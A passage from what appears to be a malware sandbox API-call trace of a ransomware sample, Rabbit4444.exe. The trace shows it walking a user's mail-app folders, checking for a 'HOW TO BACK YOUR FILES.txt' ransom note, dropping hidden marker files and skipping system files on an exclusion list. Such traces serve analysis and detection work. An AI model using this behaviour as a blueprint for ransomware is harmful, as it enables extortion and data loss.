returned 1 [0063.970] lstrcpyW (in: lpString1=0x130ec16, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0063.970] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\LocalFiles\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\localstate\\localfiles\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x278 [0063.972] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0063.972] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0063.972] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0063.972] CloseHandle (hObject=0x2a0) returned 1 [0063.972] CloseHandle (hObject=0x278) returned 1 [0063.973] GetCurrentThreadId () returned 0xd98 [0063.973] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x121fe8 [0063.973] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\LocalFiles\\923", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\LocalFiles\\923") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\LocalFiles\\923" [0063.973] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117378 | out: hHeap=0xe0000) returned 1 [0063.973] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x121fe0 | out: hHeap=0xe0000) returned 1 [0063.973] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\LocalFiles\\923" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\LocalFiles\\923") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\LocalFiles\\923" [0063.973] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\LocalFiles\\923", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\LocalFiles\\923\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\LocalFiles\\923\\" [0063.973] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\LocalFiles\\923\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\LocalFiles\\923\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\LocalFiles\\923\\.BFC0E91B00AE8A0620D3" [0063.973] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\LocalFiles\\923\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\localstate\\localfiles\\923\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0063.974] WriteFile (in: hFile=0x278, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0063.977] FlushFileBuffers (hFile=0x278) returned 1 [0063.978] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\LocalFiles\\923\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0063.978] CloseHandle (hObject=0x278) returned 1 [0063.979] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\LocalFiles\\923") returned 114 [0063.979] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0063.979] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\LocalFiles\\923\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2f23f1b3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x2f23f1b3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xef738643, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102590 [0063.979] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.979] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.979] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0063.979] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0063.979] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2f23f1b3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x2f23f1b3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xef738643, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0063.979] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.979] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.979] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0063.979] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0063.979] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0063.979] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef738643, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef738643, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef75e87d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0063.979] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.979] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0063.979] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef738643, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef738643, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef75e87d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0063.979] FindClose (in: hFindFile=0x102590 | out: hFindFile=0x102590) returned 1 [0063.979] lstrcpyW (in: lpString1=0x130ec1e, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0063.979] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\LocalFiles\\923\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\localstate\\localfiles\\923\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x278 [0063.981] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0063.981] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0063.982] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0063.982] CloseHandle (hObject=0x2a0) returned 1 [0063.982] CloseHandle (hObject=0x278) returned 1 [0063.982] GetCurrentThreadId () returned 0xd98 [0063.982] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1221e8 [0063.982] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\Files", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\Files") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\Files" [0063.982] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123760 | out: hHeap=0xe0000) returned 1 [0063.982] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1221e0 | out: hHeap=0xe0000) returned 1 [0063.982] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\Files" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\Files") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\Files" [0063.982] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\Files", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\Files\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\Files\\" [0063.982] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\Files\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\Files\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\Files\\.BFC0E91B00AE8A0620D3" [0063.982] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\Files\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\localstate\\files\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0063.983] WriteFile (in: hFile=0x278, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0063.986] FlushFileBuffers (hFile=0x278) returned 1 [0063.987] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\Files\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0063.987] CloseHandle (hObject=0x278) returned 1 [0063.987] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\Files") returned 105 [0063.987] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0063.987] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\Files\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2f13411f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x2f13411f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xef75e87d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102890 [0063.987] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.987] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.987] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0063.987] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0063.988] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2f13411f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x2f13411f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xef75e87d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0063.988] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.988] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.988] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0063.988] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0063.988] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0063.988] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef75e87d, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef75e87d, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef75e87d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0063.988] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.988] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0063.988] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2f13411f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x2f13411f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2f13411f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="S0", cAlternateFileName="")) returned 1 [0063.988] lstrcmpiW (lpString1="S0", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0063.988] lstrcmpiW (lpString1="S0", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0063.988] lstrcmpiW (lpString1="S0", lpString2="Rabbit4444.exe") returned 1 [0063.988] lstrcmpiW (lpString1="S0", lpString2=".") returned 1 [0063.988] lstrcmpiW (lpString1="S0", lpString2="..") returned 1 [0063.988] lstrcmpiW (lpString1="S0", lpString2="windows") returned -1 [0063.988] lstrcmpiW (lpString1="S0", lpString2="bootmgr") returned 1 [0063.988] lstrcmpiW (lpString1="S0", lpString2="pagefile.sys") returned 1 [0063.988] lstrcmpiW (lpString1="S0", lpString2="boot") returned 1 [0063.988] lstrcmpiW (lpString1="S0", lpString2="ids.txt") returned 1 [0063.988] lstrcmpiW (lpString1="S0", lpString2="NTUSER.DAT") returned 1 [0063.988] lstrcpyW (in: lpString1=0x130ec0c, lpString2="S0" | out: lpString1="S0") returned="S0" [0063.988] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122220 [0063.988] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xda) returned 0x125e80 [0063.988] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122228 | out: ListHead=0xf68b0, ListEntry=0x122228) returned 0x1222a8 [0063.988] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2f13411f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x2f13411f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2f13411f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="S0", cAlternateFileName="")) returned 0 [0063.988] FindClose (in: hFindFile=0x102890 | out: hFindFile=0x102890) returned 1 [0063.988] lstrcpyW (in: lpString1=0x130ec0c, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0063.988] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\Files\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\localstate\\files\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x278 [0063.989] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0063.989] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0063.989] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0063.989] CloseHandle (hObject=0x2a0) returned 1 [0063.989] CloseHandle (hObject=0x278) returned 1 [0063.989] GetCurrentThreadId () returned 0xd98 [0063.989] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122228 [0063.989] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\Files\\S0", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\Files\\S0") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\Files\\S0" [0063.990] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x125e80 | out: hHeap=0xe0000) returned 1 [0063.990] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122220 | out: hHeap=0xe0000) returned 1 [0063.990] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\Files\\S0" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\Files\\S0") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\Files\\S0" [0063.990] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\Files\\S0", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\Files\\S0\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\Files\\S0\\" [0063.990] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\Files\\S0\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\Files\\S0\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\Files\\S0\\.BFC0E91B00AE8A0620D3" [0063.990] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\Files\\S0\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\localstate\\files\\s0\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0063.991] WriteFile (in: hFile=0x278, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0063.993] FlushFileBuffers (hFile=0x278) returned 1 [0063.994] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\Files\\S0\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0063.994] CloseHandle (hObject=0x278) returned 1 [0063.994] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\Files\\S0") returned 108 [0063.994] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0063.994] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\Files\\S0\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2f13411f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x2f13411f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xef75e87d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102590 [0063.995] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.995] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.995] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0063.995] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0063.995] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2f13411f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x2f13411f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xef75e87d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0063.995] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.995] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.995] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0063.995] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0063.995] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0063.995] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef75e87d, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef75e87d, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef784aec, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0063.995] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.995] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0063.995] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef75e87d, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef75e87d, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef784aec, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, 